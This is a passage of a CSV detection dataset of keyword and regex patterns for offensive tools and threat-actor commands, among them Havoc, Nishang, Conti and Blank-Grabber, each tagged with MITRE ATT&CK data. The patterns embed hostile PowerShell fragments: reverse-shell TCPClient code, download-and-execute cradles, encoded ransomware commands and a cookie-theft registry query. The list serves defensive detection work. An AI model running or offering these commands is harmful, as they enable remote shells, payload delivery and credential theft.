"*PowerPick.x64.dll*",".{0,1000}PowerPick\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55163" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55164" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55165" "*powerpreter.psm1*",".{0,1000}powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55166" "*powerpwn.powerdump*",".{0,1000}powerpwn\.powerdump.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55167" "*powerpwn_tests*",".{0,1000}powerpwn_tests.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55168" "*power-pwn-main*",".{0,1000}power\-pwn\-main.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55169" "*PowerSCCM.ps1*",".{0,1000}PowerSCCM\.ps1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - 
TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55170" "*PowerSCCM.psd1*",".{0,1000}PowerSCCM\.psd1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55171" "*PowerSCCM.psm1*",".{0,1000}PowerSCCM\.psm1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55172" "*PowerSCCM-master*",".{0,1000}PowerSCCM\-master.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55173" "*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55174" "*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55175" "*PowerSharpBinaries*",".{0,1000}PowerSharpBinaries.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55176" "*PowerSharpPack.ps1*",".{0,1000}PowerSharpPack\.ps1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55177" "*PowerSharpPack-master*",".{0,1000}PowerSharpPack\-master.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - 
T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","55178" "*PowerShdll*",".{0,1000}PowerShdll.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","55179" "*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**",".{0,1000}powershell\s.{0,1000}C\:\\Users\\Public\\.{0,1000}\.exe.{0,1000}\sforfiles\.exe\s\/p\s.{0,1000}\\system32\s.{0,1000}\.exe.{0,1000}.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","55180" "*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*",".{0,1000}powershell\s.{0,1000}Get\-EventLog\s\-LogName\ssecurity\s\-Newest\s500\s\|\swhere\s\{\$_\.EventID\s\-eq\s4624\}\s\|\sformat\-list\s\-property\s.{0,1000}\s\|\sfindstr.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 
- T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55181" "*powershell -c *New-Object System.Net.Sockets.TCPClient(""*$sendback = (iex *$data* 2>&1 | Out-String*",".{0,1000}powershell\s\-c\s.{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(\"".{0,1000}\$sendback\s\=\s\(iex\s.{0,1000}\$data.{0,1000}\s2\>\&1\s\|\sOut\-String.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","55185" "*powershell -e $env:SigmaBootstrap*",".{0,1000}powershell\s\-e\s\$env\:SigmaBootstrap.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","55187" "*powershell -enc ((Get-PrintJob XPS).documentname -join*",".{0,1000}powershell\s\-enc\s\(\(Get\-PrintJob\sXPS\)\.documentname\s\-join.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - 
T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","55188" "*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55189" "*powershell -enc 
cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55190" "*powershell -enc 
cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #2","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55191" "*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*",".{0,1000}powershell\s\-enc\scwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #6","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black 
Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55192" "*powershell -enc dwBoAG8AYQBtAGkA*",".{0,1000}powershell\s\-enc\sdwBoAG8AYQBtAGkA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55193"
"*powershell -enc ...*",".{0,1000}powershell\s\-enc\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.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #3","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55194" "*powershell -enc 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*",".{0,1000}powershell\s\-enc\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\=.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #4","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black
Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55195" "*powershell Get-ItemPropertyValue -Path {}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY*",".{0,1000}powershell\sGet\-ItemPropertyValue\s\-Path\s\{\}\:SOFTWARE\\\\Roblox\\\\RobloxStudioBrowser\\\\roblox\.com\s\-Name\s\.ROBLOSECURITY.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#registry","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","55196" "*powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault*",".{0,1000}powershell\sGet\-ItemPropertyValue\s\-Path\s\'HKLM\:SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\SoftwareProtectionPlatform\'\s\-Name\sBackupProductKeyDefault.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#registry","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","55197" "*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString\(.{0,1000}\)\s\sGet\-NetComputer\s\-FullData\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - 
T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55198" "*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\.ps1.{0,1000}Get\-NetComputer\s\-FullData.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55199" "*powershell Invoke-WebRequest 
""http://0.0.0.0:8001/test.exe*",".{0,1000}powershell\sInvoke\-WebRequest\s\""http\:\/\/0\.0\.0\.0\:8001\/test\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","55200" "*powershell Invoke-WebRequest http*.bat *",".{0,1000}powershell\sInvoke\-WebRequest\shttp.{0,1000}\.bat\s.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","55201" "*Powershell LDAPWordlistHarvester*",".{0,1000}Powershell\sLDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","N/A","5","","N/A","","","","55202" "*powershell -nop -c """"$client = New-Object System.Net.Sockets.TCPClient*",".{0,1000}powershell\s\-nop\s\-c\s\""\$client\s\=\sNew\-Object\sSystem\.Net\.Sockets\.TCPClient.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","55204" 
"*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*",".{0,1000}powershell\s\-nop\s\-exec\sbypass\s\-EncodedCommand\sSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #14","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55205" "*powershell -w hidden -NoExit -c {start-job -s {while($TRUE){powershell -EnC ((Get-PrintJob XPS).documentname -join '');sleep 